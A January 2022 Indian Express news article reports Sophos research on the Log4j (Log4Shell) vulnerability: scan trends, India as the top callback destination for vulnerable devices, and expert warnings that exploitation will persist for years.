Follow Us:
Monday, May 23, 2022

Log4j patch is already out, but India is top call back destination for vulnerable devices

Thanks to the quick response by the global security companies, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, said Chester Wisniewski, principal research scientist at Sophos.

By: Tech Desk | Pune |
January 25, 2022 5:32:03 pm
Log4j, Log4j vulnerability, Log4j flaw, Log4Shell flaw, Log4j exploit, Log4j Apache, Log4j Apache patchIMD Director-General Mrutyunjay Mohapatra informed about the cyber attack.

While the world hasn’t seen the mass exploitation of the Log4j security flaw, it has been buried deep in many digital applications and products, that will likely be a target for exploitation for years to come— and India is the top call back destination that vulnerable devices are reaching out to, revealed a new research by Sophos.

Thanks to the quick response by the global security companies, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, said Chester Wisniewski, principal research scientist at Sophos, in a blog. However, Sophos believes that the immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanised people into action.

Log4j vulnerability disrupted severs of major web tech giant such as Microsoft, Amazon, Apple, etc. For the uninitiated, Log4j  is a very common logging library used by applications across the world. Logging lets developers see all the activity of an application. The vulnerability is serious because exploiting it could allow hackers to control java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks. In simple words, the vulnerability could allow a hacker to take control of a system.

Data by Sophos shows the top call back destinations worldwide that vulnerable (unpatched) devices are reaching out to in order to retrieve a Java payload. This brings India into the number one position and highlights Turkey, Brazil, US and even Australia. It is difficult to speculate as to why these regions are top destinations for call backs. One reason that Wisniewski gives is active participants in bug bounty programs, who are hoping to earn money by being the first to alert organizations that they are exposed.

Best of Express Premium

C Raja Mohan writes: At Quad meeting, opportunity for India to strengthen...Premium
Presidential polls: For Congress, a prelude to battles aheadPremium
ExplainSpeaking: Fiscal in the time of monetary tighteningPremium
Delhi Confidential: Haryana CM Manohar Lal Khattar and his love for JapanesePremium

Volume of exploit

Wisniewski explains that in the first few days, the volume of scans was moderate, however within a week, there was a significant increase in scan detection, with numbers peaking between December 20 and December 23, 2021.

From late December through January 2022, however, the curve of attack attempts flattened out and declined. “This doesn’t mean the threat level declined too: by this time, an ever-greater percentage of detections were likely real attacks, with fewer coming from researchers monitoring the latest patching status,” the researcher noted.

..the threat continues

According to Wisniewski , the threat is not over yet. “Just because we’ve steered round the immediate iceberg, that doesn’t mean we’re clear of the risk.”

As others have pointed out, some of the initial attack scans may have resulted in attackers securing access to a vulnerable target, but not actually abusing that access to deliver malware, for instance – so the successful breach remains undetected.

In the past Sophos has observed countries such as Iran and North Korea pounce on VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy the patches, and then waiting months before using that access in an attack.

Sophos believes that attempted exploitation of the Log4Shell vulnerability will likely continue for years and will become a favourite target for penetration testers and nation-state supported threat actors alike.  “The urgency of identifying where it is used in applications and updating the software with the patch remains as critical as ever,” the researcher added.

For all the latest Technology News, download Indian Express App.

  • Newsguard
  • The Indian Express website has been rated GREEN for its credibility and trustworthiness by Newsguard, a global service that rates news sources for their journalistic standards.
  • Newsguard